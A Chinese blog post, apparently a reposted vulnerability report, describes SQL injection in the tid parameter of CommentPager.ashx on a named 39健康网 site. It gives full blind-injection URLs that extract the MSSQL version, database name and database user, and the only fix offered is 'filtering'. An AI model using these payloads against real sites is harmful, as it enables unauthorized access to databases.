存在注入的站点如下:http://makemoney.39.net/ 39健康网某站点存在SQL注入漏洞 – 网站安全 – 自学插图   注入页面:CommentPager.ashx       注入参数:tid       正常情况:   39健康网某站点存在SQL注入漏洞 – 网站安全 – 自学插图1   and 1=1   and 1=2返回结果不一:   39健康网某站点存在SQL注入漏洞 – 网站安全 – 自学插图2 39健康网某站点存在SQL注入漏洞 – 网站安全 – 自学插图3   嗯,用substring()函数来进行盲注吧。   http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20@@version),22,4)=%272005%27       返回正常,说明mssql是2005的:    

39健康网某站点存在SQL注入漏洞 – 网站安全 – 自学插图4
    接下来猜database:   http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20db_name()),1,1)=%27A%27   返回错误   http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20db_name()),1,1)=%27C%27   返回正常,说明 数据库第一个字符是C       以此类推:得   database = Comment   试试注入user吧。       http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20user),1,1)=%27a%27   返回错误   http://makemoney.39.net/CommentPager.ashx?tid=1%20and%20substring((select%20user),1,1)=%273%27   返回正常,以此类推得:   39_Comment       当前权限:DB_OWNER    修复方案: 过滤。

    上一篇: 顺丰速运某分站注入漏洞 - 网站安全 - 自学php

    下一篇: Hacking with Unicode - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《39健康网某站点存在SQL注入漏洞 – 网站安全 – 自学
   

还没有人抢沙发呢~